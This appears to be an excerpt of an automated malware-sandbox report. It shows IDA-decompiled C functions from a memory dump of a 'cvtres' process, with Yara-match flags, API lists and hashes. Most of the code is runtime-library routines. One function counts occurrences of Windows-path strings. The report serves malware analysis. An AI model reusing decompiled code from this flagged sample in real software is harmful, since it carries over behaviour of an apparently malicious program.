				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x4408f8);
				E00427300(__ebx, __edi, __esi);
				_t28 = E00425F05(__ebx, __edx, _t31);
				_t12 =  *0x443bb0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E004279D9(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00425C8F(_t29,  *0x443df8);
					 *(_t30 - 4) = 0xfffffffe;
					E00425D49();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00425F05(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E004233A7(_t25, _t34);
				}
				return E00427345(_t29);
			}








                                                                    0x00425cdc
                                                                    0x00425cdc
                                                                    0x00425cdc
                                                                    0x00425cdc
                                                                    0x00425cdc
                                                                    0x00425cde
                                                                    0x00425ce3
                                                                    0x00425ced
                                                                    0x00425cef
                                                                    0x00425cf7
                                                                    0x00425d1b
                                                                    0x00425d1d
                                                                    0x00425d23
                                                                    0x00425d2d
                                                                    0x00425d38
                                                                    0x00425d3b
                                                                    0x00425d42
                                                                    0x00425cf9
                                                                    0x00425cf9
                                                                    0x00425cfd
                                                                    0x00000000
                                                                    0x00425cff
                                                                    0x00425d04
                                                                    0x00425d04
                                                                    0x00425cfd
                                                                    0x00425d07
                                                                    0x00425d09
                                                                    0x00425d0b
                                                                    0x00425d0d
                                                                    0x00425d12
                                                                    0x00425d1a

                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00425CE8
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __getptd.LIBCMT ref: 00425CFF
                                                                    • __amsg_exit.LIBCMT ref: 00425D0D
                                                                    • __lock.LIBCMT ref: 00425D1D
                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00425D31
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    • String ID:
                                                                    • API String ID: 938513278-0
                                                                    • Opcode ID: 085068763e0e04cbc0e655327bd616aad83163aeadefa494f9d7f1e74486b431
                                                                    • Instruction ID: b30473b7eda2014008e12d015fcb2fcbf787ee5522c11c27e254133bd8c941d7
                                                                    • Opcode Fuzzy Hash: 085068763e0e04cbc0e655327bd616aad83163aeadefa494f9d7f1e74486b431
                                                                    • Instruction Fuzzy Hash: 46F06232B54B309AE721BB7AB40A7193290AF00729FA1815FF9115B2C2CB7C5A409A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00417D7D Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 384COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00417D7D(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t231;
				signed int _t232;
				intOrPtr _t238;
				signed int _t244;
				char* _t245;
				void* _t249;
				signed int _t251;
				void* _t253;
				void* _t254;
				intOrPtr* _t257;
				intOrPtr* _t258;
				intOrPtr* _t270;
				intOrPtr* _t271;
				signed int _t276;
				intOrPtr* _t281;
				intOrPtr* _t282;
				char _t285;
				intOrPtr* _t288;
				intOrPtr* _t290;
				char* _t298;
				intOrPtr _t304;
				signed int _t306;
				intOrPtr _t307;
				signed int _t309;
				char* _t311;
				signed int _t316;
				void* _t317;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr _t330;
				intOrPtr _t333;
				char* _t341;
				intOrPtr _t361;
				void* _t372;
				signed int _t375;
				void* _t380;
				void* _t381;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t391;
				void* _t406;

				_t391 = __eflags;
				_t357 = __edx;
				E0042083E(E00433FBA, __ebx, __edi, __esi);
				 *((char*)(_t380 - 0x80)) =  *((intOrPtr*)(_t380 + 0xc));
				 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 + 0x10));
				 *(_t380 - 0x60) =  *(_t380 + 0x14);
				 *(_t380 - 0x74) =  *(_t380 + 0x18);
				 *(_t380 - 0x58) =  *(_t380 + 0x1c);
				_t361 = __ecx;
				 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 + 0x20));
				 *((intOrPtr*)(_t380 - 0x7c)) = __ecx;
				_t231 = E0040E367(__ecx, _t380 - 0x84);
				_t316 = 0;
				 *(_t380 - 4) = 0;
				_t232 = E00418714(0, _t361, _t380 - 0x84, _t391);
				 *(_t380 - 4) =  *(_t380 - 4) | 0xffffffff;
				_t375 = _t232;
				 *(_t380 - 0x6c) = _t375;
				E0040E0FE(_t380 - 0x84);
				E00418661(_t375, _t380 - 0x48);
				 *(_t380 - 4) = 1;
				_t329 = _t375;
				 *((char*)(_t380 - 0x8c)) =  *((intOrPtr*)( *_t375 + 8))(_t231, 0x80);
				 *((intOrPtr*)(_t380 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t380 - 0x1c)) = 0;
				 *((char*)(_t380 - 0x2c)) = 0;
				_t376 =  *((intOrPtr*)(_t380 - 0x4c));
				 *(_t380 - 4) = 2;
				_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c))));
				if(_t238 == 0x2b) {
					L2:
					 *(_t380 - 0x78) = 1;
					L3:
					 *((char*)(_t380 - 0x5c)) =  *((intOrPtr*)( *((intOrPtr*)(E0041FD3A(_t361, _t376, _t393)))));
					 *((short*)(_t380 - 0x5b)) = 0x65;
					 *(_t380 - 0x54) = E0041E960(_t376, 0x65,  *((intOrPtr*)(_t380 - 0x50)));
					_t244 = E0041E960(_t376,  *((char*)(_t380 - 0x5c)),  *((intOrPtr*)(_t380 - 0x50)));
					_t383 = _t381 + 0x18;
					 *(_t380 - 0x64) = _t244;
					if(_t244 == _t316) {
						 *(_t380 - 0x58) = _t316;
					}
					_t245 =  *((intOrPtr*)(_t380 - 0x48));
					if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
						_t245 = _t380 - 0x48;
					}
					if( *_t245 == 0x7f) {
						L32:
						_t330 =  *((intOrPtr*)(_t361 + 0x20));
						_t249 =  *((intOrPtr*)(_t380 - 0x50)) +  *(_t380 - 0x58) +  *(_t380 - 0x74) +  *(_t380 - 0x60);
						_t406 =  *((intOrPtr*)(_t361 + 0x24)) - _t316;
						if(_t406 < 0 || _t406 <= 0 && _t330 <= _t316 || _t330 <= _t249) {
							 *(_t380 - 0x54) = _t316;
						} else {
							 *(_t380 - 0x54) = _t330 - _t249;
						}
						_t251 =  *(_t361 + 0x14) & 0x000001c0;
						if(_t251 != 0x40) {
							if(_t251 == 0x100 &&  *(_t380 - 0x78) > _t316) {
								 *((intOrPtr*)(_t380 - 0x68)) =  *((intOrPtr*)(_t380 + 0x24));
								 *(_t380 - 0x64) =  *(_t380 + 0x28);
								_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c))));
								_t376 = _t380 - 0x68;
								E00418619( *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c)))), _t380 - 0x68);
								 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + 1;
								 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - 1;
								 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x68));
								 *(_t380 + 0x28) =  *(_t380 - 0x64);
							}
							_t290 = E00418469(_t380 - 0x68,  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28),  *((intOrPtr*)(_t380 - 0x80)),  *(_t380 - 0x54));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t290;
							 *(_t380 - 0x54) = _t316;
							 *(_t380 + 0x28) =  *(_t290 + 4);
							_t383 = _t383 + 0x10;
						}
						_t253 = E0041E960( *((intOrPtr*)(_t380 - 0x4c)),  *((char*)(_t380 - 0x5c)),  *((intOrPtr*)(_t380 - 0x50)));
						_t384 = _t383 + 0xc;
						if(_t253 != _t316) {
							_t317 = _t253 -  *((intOrPtr*)(_t380 - 0x4c)) + 1;
							_t281 = E00418591( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x68, _t317 - 1,  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t281;
							 *(_t380 + 0x28) =  *(_t281 + 4);
							_t282 = E00418469(_t380 - 0x68,  *_t281,  *(_t281 + 4), 0x30,  *(_t380 - 0x60));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t282;
							 *(_t380 + 0x28) =  *(_t282 + 4);
							_t285 =  *((intOrPtr*)( *( *(_t380 - 0x6c)) + 4))();
							 *((intOrPtr*)(_t380 - 0x70)) =  *((intOrPtr*)(_t380 + 0x24));
							_t357 = _t285;
							_t376 = _t380 - 0x70;
							 *(_t380 - 0x6c) =  *(_t380 + 0x28);
							E00418619(_t285, _t380 - 0x70);
							 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x70));
							 *(_t380 + 0x28) =  *(_t380 - 0x6c);
							_t288 = E00418469(_t380 - 0x70,  *((intOrPtr*)(_t380 - 0x70)),  *(_t380 - 0x6c), 0x30,  *(_t380 - 0x74));
							 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + _t317;
							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - _t317;
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t288;
							_t384 = _t384 + 0x34;
							 *(_t380 + 0x28) =  *(_t288 + 4);
							_t316 = 0;
						}
						_t254 = E0041E960( *((intOrPtr*)(_t380 - 0x4c)), 0x65,  *((intOrPtr*)(_t380 - 0x50)));
						_t385 = _t384 + 0xc;
						if(_t254 != _t316) {
							 *(_t380 - 0x6c) = _t254 -  *((intOrPtr*)(_t380 - 0x4c)) + 1;
							_t270 = E00418591( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x88, _t254 -  *((intOrPtr*)(_t380 - 0x4c)) + 1 - 1,  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t270;
							 *(_t380 + 0x28) =  *(_t270 + 4);
							_t271 = E00418469(_t380 - 0x68,  *_t270,  *(_t270 + 4), 0x30,  *(_t380 - 0x58));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t271;
							 *(_t380 + 0x28) =  *(_t271 + 4);
							_t385 = _t385 + 0x24;
							 *(_t380 - 0x58) = _t316;
							_t341 = "E";
							if(( *( *((intOrPtr*)(_t380 - 0x7c)) + 0x14) & 0x00000004) == 0) {
								_t341 = "e";
							}
							 *((intOrPtr*)(_t380 - 0x88)) =  *_t271;
							_t357 =  *_t341;
							_t376 = _t380 - 0x88;
							 *(_t380 - 0x84) =  *(_t271 + 4);
							E00418619( *_t341, _t380 - 0x88);
							 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x88));
							 *(_t380 + 0x28) =  *(_t380 - 0x84);
							_t276 =  *(_t380 - 0x6c);
							 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + _t276;
							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - _t276;
						}
						_t257 = E00418591( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x70,  *((intOrPtr*)(_t380 - 0x50)),  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
						 *((intOrPtr*)(_t380 + 0x24)) =  *_t257;
						 *(_t380 + 0x28) =  *(_t257 + 4);
						_t258 = E00418469(_t380 - 0x68,  *_t257,  *(_t257 + 4), 0x30,  *(_t380 - 0x58));
						_t333 =  *((intOrPtr*)(_t380 - 0x7c));
						 *((intOrPtr*)(_t380 + 0x24)) =  *_t258;
						 *(_t380 + 0x28) =  *(_t258 + 4);
						 *(_t333 + 0x20) = _t316;
						 *(_t333 + 0x24) = _t316;
						E00418469( *((intOrPtr*)(_t380 + 8)),  *_t258,  *(_t258 + 4),  *((intOrPtr*)(_t380 - 0x80)),  *(_t380 - 0x54));
						E00404354(_t380 - 0x2c, 1, _t316);
						E00404354(_t380 - 0x48, 1, _t316);
						return E00420888(_t316,  *((intOrPtr*)(_t380 + 8)), _t376);
					} else {
						_t298 =  *((intOrPtr*)(_t380 - 0x48));
						if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
							_t298 = _t380 - 0x48;
						}
						_t398 =  *_t298;
						if( *_t298 > 0) {
							E0040C2E9(_t380 - 0x2c,  *((intOrPtr*)(_t380 - 0x50)), _t380, _t398, _t376);
							if( *(_t380 - 0x54) != 0) {
								__eflags =  *(_t380 - 0x64);
								if( *(_t380 - 0x64) == 0) {
									E0040C3CF( *(_t380 - 0x60), _t329, _t380 - 0x2c, _t380, 0x30);
									_t53 = _t380 - 0x60;
									 *_t53 =  *(_t380 - 0x60) & 0x00000000;
									__eflags =  *_t53;
								}
								__eflags =  *(_t380 - 0x54) -  *((intOrPtr*)(_t380 - 0x4c));
								E00417C5A(_t329,  *(_t380 - 0x54) -  *((intOrPtr*)(_t380 - 0x4c)), _t380 - 0x2c, _t380,  *(_t380 - 0x58), 0x30);
							} else {
								E0040C3CF( *(_t380 - 0x58), _t329, _t380 - 0x2c, _t380, 0x30);
							}
							_t319 =  *(_t380 - 0x64);
							_push(0x30);
							_t376 = _t380 - 0x2c;
							if( *(_t380 - 0x64) != 0) {
								_push( *(_t380 - 0x74));
								E00417C5A(_t329, _t319 -  *((intOrPtr*)(_t380 - 0x4c)) + 1, _t376, _t380);
								_t376 = _t380 - 0x2c;
								E00417C5A(_t329, _t319 -  *((intOrPtr*)(_t380 - 0x4c)), _t380 - 0x2c, _t380,  *(_t380 - 0x60), 0x30);
								_t67 = _t380 - 0x74;
								 *_t67 =  *(_t380 - 0x74) & 0x00000000;
								__eflags =  *_t67;
							} else {
								E0040C3CF( *(_t380 - 0x60), _t329, _t376, _t380);
							}
							 *(_t380 - 0x60) =  *(_t380 - 0x60) & 0x00000000;
							_t321 =  *((intOrPtr*)(_t380 - 0x48));
							if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
								_t321 = _t380 - 0x48;
							}
							_t304 =  *((intOrPtr*)(_t380 - 0x2c));
							if( *((intOrPtr*)(_t380 - 0x18)) < 0x10) {
								_t304 = _t380 - 0x2c;
							}
							_t372 = E0041FDA0(_t380 - 0x5c, _t304, _t380 - 0x5c);
							while(1) {
								_t306 =  *_t321;
								if(_t306 == 0x7f) {
									break;
								}
								__eflags = _t306;
								if(_t306 <= 0) {
									break;
								}
								_t356 = _t372 -  *(_t380 - 0x78);
								_t309 = _t306;
								__eflags = _t309 - _t372 -  *(_t380 - 0x78);
								if(_t309 >= _t372 -  *(_t380 - 0x78)) {
									break;
								}
								_t372 = _t372 - _t309;
								_t376 = _t380 - 0x2c;
								E00417C5A(_t356, _t372, _t380 - 0x2c, _t380, 1, 0);
								_t311 = _t321 + 1;
								__eflags =  *_t311;
								if( *_t311 > 0) {
									_t321 = _t311;
								}
							}
							_t307 =  *((intOrPtr*)(_t380 - 0x2c));
							if( *((intOrPtr*)(_t380 - 0x18)) < 0x10) {
								_t307 = _t380 - 0x2c;
							}
							 *(_t380 - 0x58) =  *(_t380 - 0x58) & 0x00000000;
							_t361 =  *((intOrPtr*)(_t380 - 0x7c));
							 *((intOrPtr*)(_t380 - 0x4c)) = _t307;
							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x1c));
							_t316 = 0;
						}
						goto L32;
					}
				}
				 *(_t380 - 0x78) = 0;
				_t393 = _t238 - 0x2d;
				if(_t238 != 0x2d) {
					goto L3;
				}
				goto L2;
			}













































                                                                    0x00417d7d
                                                                    0x00417d7d
                                                                    0x00417d87
                                                                    0x00417d8f
                                                                    0x00417d95
                                                                    0x00417d9b
                                                                    0x00417da1
                                                                    0x00417da7
                                                                    0x00417dad
                                                                    0x00417daf
                                                                    0x00417dba
                                                                    0x00417dbd
                                                                    0x00417dc2
                                                                    0x00417dc5
                                                                    0x00417dc8
                                                                    0x00417dcd
                                                                    0x00417dd2
                                                                    0x00417dda
                                                                    0x00417ddd
                                                                    0x00417de8
                                                                    0x00417ded
                                                                    0x00417df6
                                                                    0x00417dfb
                                                                    0x00417e01
                                                                    0x00417e08
                                                                    0x00417e0b
                                                                    0x00417e0e
                                                                    0x00417e11
                                                                    0x00417e15
                                                                    0x00417e19
                                                                    0x00417e22
                                                                    0x00417e22
                                                                    0x00417e29
                                                                    0x00417e38
                                                                    0x00417e3b
                                                                    0x00417e4c
                                                                    0x00417e55
                                                                    0x00417e5a
                                                                    0x00417e5d
                                                                    0x00417e62
                                                                    0x00417e64
                                                                    0x00417e64
                                                                    0x00417e6b
                                                                    0x00417e6e
                                                                    0x00417e70
                                                                    0x00417e70
                                                                    0x00417e76
                                                                    0x00417f8b
                                                                    0x00417f91
                                                                    0x00417f97
                                                                    0x00417f9a
                                                                    0x00417f9d
                                                                    0x00417fb0
                                                                    0x00417fa9
                                                                    0x00417fab
                                                                    0x00417fab
                                                                    0x00417fb6
                                                                    0x00417fbe
                                                                    0x00417fc5
                                                                    0x00417fcf
                                                                    0x00417fd5
                                                                    0x00417fdb
                                                                    0x00417fdd
                                                                    0x00417fe0
                                                                    0x00417fe8
                                                                    0x00417feb
                                                                    0x00417fee
                                                                    0x00417ff4
                                                                    0x00417ff4
                                                                    0x00418006
                                                                    0x0041800d
                                                                    0x00418013
                                                                    0x00418016
                                                                    0x00418019
                                                                    0x00418019
                                                                    0x00418027
                                                                    0x0041802c
                                                                    0x00418031
                                                                    0x00418040
                                                                    0x00418054
                                                                    0x00418061
                                                                    0x00418067
                                                                    0x00418074
                                                                    0x0041807b
                                                                    0x00418084
                                                                    0x0041808c
                                                                    0x00418092
                                                                    0x00418098
                                                                    0x0041809a
                                                                    0x0041809d
                                                                    0x004180a0
                                                                    0x004180b5
                                                                    0x004180b8
                                                                    0x004180bb
                                                                    0x004180c2
                                                                    0x004180c5
                                                                    0x004180c8
                                                                    0x004180ce
                                                                    0x004180d1
                                                                    0x004180d4
                                                                    0x004180d4
                                                                    0x004180de
                                                                    0x004180e3
                                                                    0x004180e8
                                                                    0x004180fe
                                                                    0x0041810d
                                                                    0x0041811a
                                                                    0x00418120
                                                                    0x0041812d
                                                                    0x00418134
                                                                    0x0041813a
                                                                    0x00418140
                                                                    0x00418147
                                                                    0x0041814a
                                                                    0x0041814f
                                                                    0x00418151
                                                                    0x00418151
                                                                    0x0041815b
                                                                    0x00418161
                                                                    0x00418163
                                                                    0x00418169
                                                                    0x0041816f
                                                                    0x0041817a
                                                                    0x00418183
                                                                    0x00418186
                                                                    0x00418189
                                                                    0x0041818c
                                                                    0x0041818c
                                                                    0x004181a5
                                                                    0x004181b2
                                                                    0x004181b8
                                                                    0x004181c5
                                                                    0x004181cf
                                                                    0x004181d8
                                                                    0x004181e0
                                                                    0x004181e3
                                                                    0x004181e6
                                                                    0x004181e9
                                                                    0x004181f7
                                                                    0x00418202
                                                                    0x0041820e
                                                                    0x00417e7c
                                                                    0x00417e80
                                                                    0x00417e83
                                                                    0x00417e85
                                                                    0x00417e85
                                                                    0x00417e88
                                                                    0x00417e8b
                                                                    0x00417e98
                                                                    0x00417ea1
                                                                    0x00417eb2
                                                                    0x00417eb6
                                                                    0x00417ec0
                                                                    0x00417ec5
                                                                    0x00417ec5
                                                                    0x00417ec5
                                                                    0x00417ec5
                                                                    0x00417ecc
                                                                    0x00417ed7
                                                                    0x00417ea3
                                                                    0x00417eab
                                                                    0x00417eab
                                                                    0x00417edc
                                                                    0x00417edf
                                                                    0x00417ee1
                                                                    0x00417ee6
                                                                    0x00417ef5
                                                                    0x00417efb
                                                                    0x00417f07
                                                                    0x00417f0a
                                                                    0x00417f0f
                                                                    0x00417f0f
                                                                    0x00417f0f
                                                                    0x00417ee8
                                                                    0x00417eeb
                                                                    0x00417eeb
                                                                    0x00417f13
                                                                    0x00417f1b
                                                                    0x00417f1e
                                                                    0x00417f20
                                                                    0x00417f20
                                                                    0x00417f27
                                                                    0x00417f2a
                                                                    0x00417f2c
                                                                    0x00417f2c
                                                                    0x00417f3b
                                                                    0x00417f67
                                                                    0x00417f67
                                                                    0x00417f6b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00417f3f
                                                                    0x00417f41
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00417f45
                                                                    0x00417f48
                                                                    0x00417f4b
                                                                    0x00417f4d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00417f51
                                                                    0x00417f55
                                                                    0x00417f58
                                                                    0x00417f5d
                                                                    0x00417f60
                                                                    0x00417f63
                                                                    0x00417f65
                                                                    0x00417f65
                                                                    0x00417f63
                                                                    0x00417f71
                                                                    0x00417f74
                                                                    0x00417f76
                                                                    0x00417f76
                                                                    0x00417f79
                                                                    0x00417f7d
                                                                    0x00417f80
                                                                    0x00417f86
                                                                    0x00417f89
                                                                    0x00417f89
                                                                    0x00000000
                                                                    0x00417e8b
                                                                    0x00417e76
                                                                    0x00417e1b
                                                                    0x00417e1e
                                                                    0x00417e20
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00417D87
                                                                      • Part of subcall function 0040E367: std::locale::facet::_Incref.LIBCPMT ref: 0040E36E
                                                                      • Part of subcall function 00418714: __EH_prolog3.LIBCMT ref: 0041871B
                                                                      • Part of subcall function 00418714: std::_Lockit::_Lockit.LIBCPMT ref: 00418725
                                                                    • _localeconv.LIBCMT ref: 00417E29
                                                                    • _strcspn.LIBCMT ref: 00417F34
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::facet::_
                                                                    • String ID: e
                                                                    • API String ID: 441263477-4024072794
                                                                    • Opcode ID: c936e7cf8a01c4a202f77bad19f55d2c6cb156e13ac2061a4452768913dc2194
                                                                    • Instruction ID: 29acf64dfad355f7b7e1bab66952c210668dbd1d81d79163391d8d13252e589e
                                                                    • Opcode Fuzzy Hash: c936e7cf8a01c4a202f77bad19f55d2c6cb156e13ac2061a4452768913dc2194
                                                                    • Instruction Fuzzy Hash: F602F371D00248DFCF15DFA9C881ADDBBB1BF08308F15816AE909AB252D735A986CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004091E5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 97%
                                                                    			E004091E5(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t33;
				void* _t83;
				signed int _t90;
				signed int _t91;
				void* _t92;

				_push(0x20);
				E0042083E(E00433F7A, __ebx, __edi, __esi);
				_t90 = _t92 - 0x2c;
				 *((intOrPtr*)(_t92 - 4)) = 0;
				_t83 = 0;
				E00404778(_t90, _t92 + 8);
				_t33 = E0040C00F(_t90, "C:\\Windows\\", 0);
				_t91 = _t90 | 0xffffffff;
				if(_t33 != _t91) {
					_t83 = 1;
				}
				if(E0040C00F(_t92 - 0x2c, "C:\\\\Windows\\", 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c, "C:\\\\\\Windows\\", 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x4460d4, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445ffc, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x446004, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445d28, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445dcc, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x446014, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445ba0, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445f6c, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445cf0, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445ea8, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445e38, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x446180, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445f4c, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445fc8, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445d74, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445e34, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445b9c, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445aa0, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x445bfc, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				if(E0040C00F(_t92 - 0x2c,  *0x446010, 0) != _t91) {
					_t83 = _t83 + 1;
				}
				E00404354(_t92 - 0x2c, 1, 0);
				E00404354(_t92 + 8, 1, 0);
				return E00420888(_t83, 0, _t91);
			}








                                                                    0x004091e5
                                                                    0x004091ec
                                                                    0x004091f7
                                                                    0x004091fa
                                                                    0x004091fd
                                                                    0x004091ff
                                                                    0x0040920d
                                                                    0x00409212
                                                                    0x00409217
                                                                    0x00409219
                                                                    0x00409219
                                                                    0x0040922b
                                                                    0x0040922d
                                                                    0x0040922d
                                                                    0x0040923f
                                                                    0x00409241
                                                                    0x00409241
                                                                    0x00409254
                                                                    0x00409256
                                                                    0x00409256
                                                                    0x00409269
                                                                    0x0040926b
                                                                    0x0040926b
                                                                    0x0040927e
                                                                    0x00409280
                                                                    0x00409280
                                                                    0x00409293
                                                                    0x00409295
                                                                    0x00409295
                                                                    0x004092a8
                                                                    0x004092aa
                                                                    0x004092aa
                                                                    0x004092bd
                                                                    0x004092bf
                                                                    0x004092bf
                                                                    0x004092d2
                                                                    0x004092d4
                                                                    0x004092d4
                                                                    0x004092e7
                                                                    0x004092e9
                                                                    0x004092e9
                                                                    0x004092fc
                                                                    0x004092fe
                                                                    0x004092fe
                                                                    0x00409311
                                                                    0x00409313
                                                                    0x00409313
                                                                    0x00409326
                                                                    0x00409328
                                                                    0x00409328
                                                                    0x0040933b
                                                                    0x0040933d
                                                                    0x0040933d
                                                                    0x00409350
                                                                    0x00409352
                                                                    0x00409352
                                                                    0x00409365
                                                                    0x00409367
                                                                    0x00409367
                                                                    0x0040937a
                                                                    0x0040937c
                                                                    0x0040937c
                                                                    0x0040938f
                                                                    0x00409391
                                                                    0x00409391
                                                                    0x004093a4
                                                                    0x004093a6
                                                                    0x004093a6
                                                                    0x004093b9
                                                                    0x004093bb
                                                                    0x004093bb
                                                                    0x004093ce
                                                                    0x004093d0
                                                                    0x004093d0
                                                                    0x004093e3
                                                                    0x004093e5
                                                                    0x004093e5
                                                                    0x004093ec
                                                                    0x004093f7
                                                                    0x00409403

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: C:\Windows\$C:\\Windows\$C:\\\Windows\
                                                                    • API String ID: 2427045233-1289299778
                                                                    • Opcode ID: a42c2bce63919a1d40cd009a0b5b961e4d63c1d9277672bf13a03d12b4d4731c
